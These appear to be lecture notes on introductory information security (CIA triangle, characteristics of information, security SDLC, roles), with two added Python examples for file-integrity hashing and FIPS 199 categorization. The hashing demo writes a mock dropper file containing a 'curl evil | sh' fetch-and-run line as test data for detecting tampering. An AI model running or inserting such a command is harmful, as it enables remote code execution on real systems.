Principles of Information Security, 3rd Edition 2
Learning Objectives
Upon completion of this material, you should be able to:
Define information security
Relate the history of computer security and how it evolved into information security
Define key terms and critical concepts of information security as presented in this chapter
Discuss the phases of the security systems development life cycle
Present the roles of professionals involved in information security within an organization
What is Security?
“The quality or state of being secure—to be free from danger,” i.e. protection against adversaries
A successful organization should have multiple layers of security in place:
Physical security
Personal security
Operations security
Communications security
Network security
Information security
What is Security? (continued)
Information security: the protection of information and its critical elements, including the systems and hardware that use, store, and transmit that information (CNSS/NSTISSC definition)
Necessary tools for protection: policy, awareness, training, education, and technology
The NSTISSC model evolved from the C.I.A. triangle, the industry standard for computer security since the mainframe era
C.I.A. triangle: based on confidentiality, integrity, and availability
The C.I.A. triangle no longer adequately addresses the constantly changing environment, so it has been expanded into a list of critical characteristics of information
Critical Characteristics of Information
The value of information comes from the characteristics it possesses; when a characteristic changes, the value of the information increases or decreases
Availability: authorized users can access the information without obstruction and in the required format (e.g., a research library where patrons with proper identification can check out material in the form they need)
Accuracy: free from mistakes or errors and having the value the end user expects (e.g., a bank account balance that does not match reality is inaccurate)
Authenticity: the quality of being genuine or original, not a fabrication or reproduction (threatened by spoofing and phishing, e.g., forged e-mail sender addresses)
Confidentiality: prevention of disclosure or exposure to unauthorized individuals or systems; measures include information classification, secure document storage, application of general security policies, and education of information custodians and end users (e.g., salami theft)
Integrity: information is whole, complete, and uncorrupted; threatened by viruses and worms that modify files (often detected as a change in file size) and by noise during transmission; verified by file hashing, in which a hashing algorithm computes a hash value that is later recomputed and compared; transmission errors are prevented or corrected by error-correcting algorithms and codes
Utility: the information has value for some purpose and is presented in a meaningful format
Possession: ownership or control of the information (a breach of possession does not necessarily breach confidentiality, e.g., stolen but encrypted data)
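As an added example that is not part of the textbook slides: the file-hashing check described under Integrity, written in Python. It builds a manifest of SHA-256 digests for a directory and re-verifies it later, reporting modified, added, and removed files. The directory layout and file contents in demo() are constructed for the demonstration; the same-length tampering there shows why a digest catches what a file-size check alone would miss.

```python
"""Integrity verification by file hashing (added example, not textbook code).
Build a manifest of SHA-256 digests, then re-verify a directory against it.
All files and contents below are constructed for the demonstration."""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def sha256_bytes(data: bytes) -> str:
    """Hex SHA-256 digest of an in-memory byte string."""
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: Path, chunk_size: int = 1 << 16) -> str:
    """Hex SHA-256 digest of a file, read in chunks so large files need not
    fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its digest."""
    manifest: dict[str, str] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def verify_manifest(root: Path, manifest: dict[str, str]) -> dict[str, list[str]]:
    """Compare the current state of root against a stored manifest and report
    which files were modified, added, or removed since the baseline."""
    current = build_manifest(root)
    return {
        "modified": sorted(f for f in manifest if f in current and current[f] != manifest[f]),
        "added": sorted(f for f in current if f not in manifest),
        "removed": sorted(f for f in manifest if f not in current),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline three files, then replace one binary with
    a same-length payload, drop a new script, and delete a file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "app").write_bytes(b"\x7fELF original build  ")
        (root / "etc.conf").write_text("port=8080\n")
        (root / "README").write_text("hello\n")
        baseline = build_manifest(root)

        # Same-length substitution: a file-size check would not notice this,
        # but the digest changes.
        (root / "bin" / "app").write_bytes(b"\x7fELF backdoor build  ")
        (root / "dropper.sh").write_text("curl evil | sh\n")
        (root / "README").unlink()

        return verify_manifest(root, baseline)


if __name__ == "__main__":
    print(demo())
```

The manifest itself must be protected (stored read-only or signed), otherwise an attacker who can modify files can also update the stored hash values; the comparison only tells you that a file differs from the baseline, not why.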
Figure 1-4 – NSTISSC Security Model (a 3x3x3 cube: confidentiality, integrity, and availability; storage, processing, and transmission; policy, education, and technology)
Components of an Information System
An information system (IS) is the entire set of software, hardware, data, people, procedures, and networks necessary to use information as a resource in the organization
Securing Components
A computer can be the subject of an attack and/or the object of an attack
When the subject of an attack, the computer is used as an active tool to conduct the attack
When the object of an attack, the computer is the entity being attacked
Direct attack: the attacker uses a personal computer to break into a system; indirect attack: a compromised system is used as the subject to attack other systems
Figure 1-5 – Subject and Object of Attack
Balancing Information Security and Access
Impossible to obtain perfect security—it is a process, not an absolute
Security should be considered balance between protection and availability
To achieve balance, level of security must allow reasonable access, yet protect against threats
Figure 1-6 – Balancing Security and Access
Approaches to Information Security Implementation: Bottom-Up Approach
Grassroots effort: systems administrators attempt to improve security of their systems
Key advantage: technical expertise of individual administrators
Seldom works, as it lacks a number of critical features:
Participant support
Organizational staying power
Approaches to Information Security Implementation: Top-Down Approach
Initiated by upper management
Issue policy, procedures, and processes
Dictate goals and expected outcomes of project
Determine accountability for each required action
The most successful also involve formal development strategy referred to as systems development life cycle
Securing the System Development Life Cycle
Each phase of the SDLC should consider the security of both the system under development and the information it processes
Applies whether the system is custom-developed or commercial off-the-shelf (COTS)
The organization decides whether to follow a general SDLC or one tailored to its needs
NIST recommends information security steps to be carried out in each phase (NIST SP 800-64)
Securing the System Development Life Cycle (continued)
Investigation/Analysis Phase:
Security categorization (low, moderate, or high impact): depends on the system and the information it handles; assists in selecting the security controls needed to protect that information
Preliminary risk assessment: defines the threat environment in which the system will operate
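An added example, not from the slides, of the security categorization step. The slide only names the low/moderate/high levels, so this Python code goes one step further and applies the FIPS 199 "high-water mark" rule that NIST uses to derive those levels from per-objective impact ratings of each information type the system handles. The information types and ratings in demo() are constructed for illustration.

```python
"""Security categorization for the investigation/analysis phase (added
example, not textbook code). Implements the FIPS 199 high-water mark:
the system's category for each security objective is the highest impact
rating of any information type it handles, and the overall category is the
highest of the three objectives."""
from __future__ import annotations

# Impact levels in increasing order. "na" (not applicable) is allowed by
# FIPS 199 only for confidentiality, e.g. information that is already public.
LEVELS = {"na": 0, "low": 1, "moderate": 2, "high": 3}
OBJECTIVES = ("confidentiality", "integrity", "availability")


def categorize(info_types: dict[str, dict[str, str]]) -> dict[str, str]:
    """info_types maps an information type name to its impact rating for each
    security objective. Returns the per-objective category plus "overall"."""
    result: dict[str, str] = {}
    for obj in OBJECTIVES:
        # Integrity and availability are never lower than "low".
        worst = "na" if obj == "confidentiality" else "low"
        for name, ratings in info_types.items():
            level = ratings.get(obj)
            if level not in LEVELS:
                raise ValueError(f"{name}: bad {obj} rating {level!r}")
            if level == "na" and obj != "confidentiality":
                raise ValueError(f"{name}: 'na' is only allowed for confidentiality")
            if LEVELS[level] > LEVELS[worst]:
                worst = level
        result[obj] = worst
    result["overall"] = max((result[o] for o in OBJECTIVES), key=LEVELS.__getitem__)
    return result


def format_sc(system_name: str, category: dict[str, str]) -> str:
    """Render the result in the FIPS 199 notation used in categorization
    documents, e.g. SC portal = {(confidentiality, HIGH), ...}."""
    pairs = ", ".join(f"({o}, {category[o].upper()})" for o in OBJECTIVES)
    return f"SC {system_name} = {{{pairs}}}"


def demo() -> dict[str, str]:
    # Constructed: a customer portal that serves public press releases but also
    # processes payment records and keeps its own audit logs.
    system = {
        "public press releases": {"confidentiality": "na", "integrity": "moderate", "availability": "low"},
        "customer payment records": {"confidentiality": "high", "integrity": "moderate", "availability": "moderate"},
        "system audit logs": {"confidentiality": "moderate", "integrity": "high", "availability": "low"},
    }
    return categorize(system)


if __name__ == "__main__":
    print(format_sc("portal", demo()))
```

The overall category drives the control baseline selected in the design phase; the common mistake is to categorize only the system's primary information type and miss a secondary one (here the audit logs) that raises integrity to high.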
Securing the System Development Life Cycle (continued)
Logical/Physical Design Phase:
Risk assessment: builds on the initial risk assessment now that more is known about the system design
Security functional requirements analysis: describes the system security environment and the security functional requirements the system must meet
Security assurance requirements analysis: identifies the development activities required and the evidence needed to give confidence that the information security controls are effective
Cost considerations: software, hardware, and people costs of the security controls
Securing the System Development Life Cycle (continued)
Security planning: documents the agreed-upon plans, such as the contingency plan, the configuration management (CM) plan, the incident response plan, and others
Security control development: ensures that the controls described in the security plan are designed, developed, and implemented
Securing the System Development Life Cycle (continued)
Developmental security test and evaluation: tests the implemented controls; some controls cannot be tested until the system is deployed
Other planning components: ensures that all necessary components are considered, including the contract type, the participation of all functional groups, and the involvement of the certifier and accreditor
Securing the System Development Life Cycle (continued)
Implementation Phase:
Inspection and acceptance: verifies and validates the functionality in the deliverables
System integration: ensures the system is properly integrated into its deployment environment
Security certification: uncovers vulnerabilities and ensures that the controls are implemented effectively, using established procedures and validation techniques
Security accreditation: provides official authorization for the system to store, process, and transmit information; granted by a senior official
Securing the System Development Life Cycle (continued)
Maintenance and Change Phase:
Configuration management and control: ensures information security is adequately considered whenever the system is changed
Continuous monitoring: ensures that the controls remain effective over time
Information preservation: retains information to meet current legal requirements and to accommodate future technology changes
Media sanitization: ensures unwanted data is deleted, erased, or destroyed before media are reused or disposed of
Hardware and software disposal: disposes of the system's hardware and software securely when the system is retired
Senior Management
Chief Information Officer (CIO)
Senior technology officer
Primarily responsible for advising senior executives on strategic planning
Chief Information Security Officer (CISO)/information security manager
Primarily responsible for the assessment, management, and implementation of information security in the organization
Usually reports directly to the CIO
Information Security Project Team
A number of individuals who are experienced in one or more facets of the required technical and nontechnical areas:
Champion: senior executive who promotes the project and provides financial and administrative support
Team leader: project manager who understands project management, personnel management, and the technical requirements of information security
Security policy developers
Risk assessment specialists
Security professionals
Systems administrators
End users
Data Ownership
Data owner: responsible for the security and use of a particular set of information
Data custodian: responsible for storage, maintenance, and protection of information
Data users: end users who work with information to perform their daily jobs supporting the mission of the organization
Communities of Interest
Group of individuals united by similar interests or values within an organization, or who share common goals in meeting the organization's objectives:
Information security management and professionals: protect the organization's information from attack
Information technology management and professionals: focus on cost and ease of use of the systems
Organizational management and professionals (the general users, who are also the subjects of security controls): responsible for execution, production, human resources, and the other business functions
Information Security: Is it an Art or a Science?
Implementation of information security often described as combination of art and science
The “security artesan” idea is based on the way individuals have perceived systems technologists since computers became commonplace
Security as Art
Like a painter, the security practitioner works with no hard and fast rules and few universally accepted complete solutions
There is no manual for implementing security across an entire system
Security as Science
Dealing with technology designed to operate at high levels of performance
Specific conditions cause virtually all actions that occur in computer systems
Nearly every fault, security hole, and systems malfunction is a result of the interaction of specific hardware and software
If developers had sufficient time, they could resolve and eliminate these faults
Security as a Social Science
Social science examines the behavior of individuals interacting with systems
Security begins and ends with the people that interact with the system
Security administrators can greatly reduce levels of risk caused by end users, and create more acceptable and supportable security profiles
Summary
Information security is a “well-informed sense of assurance that the information risks and controls are in balance”
Computer security began immediately after first mainframes were developed
Successful organizations have multiple layers of security in place: physical, personal, operations, communications, network, and information
Summary (continued)
Security should be considered a balance between protection and availability
Information security must be managed similarly to any major system implemented in an organization using a methodology like SecSDLC
Implementation of information security often described as a combination of art and science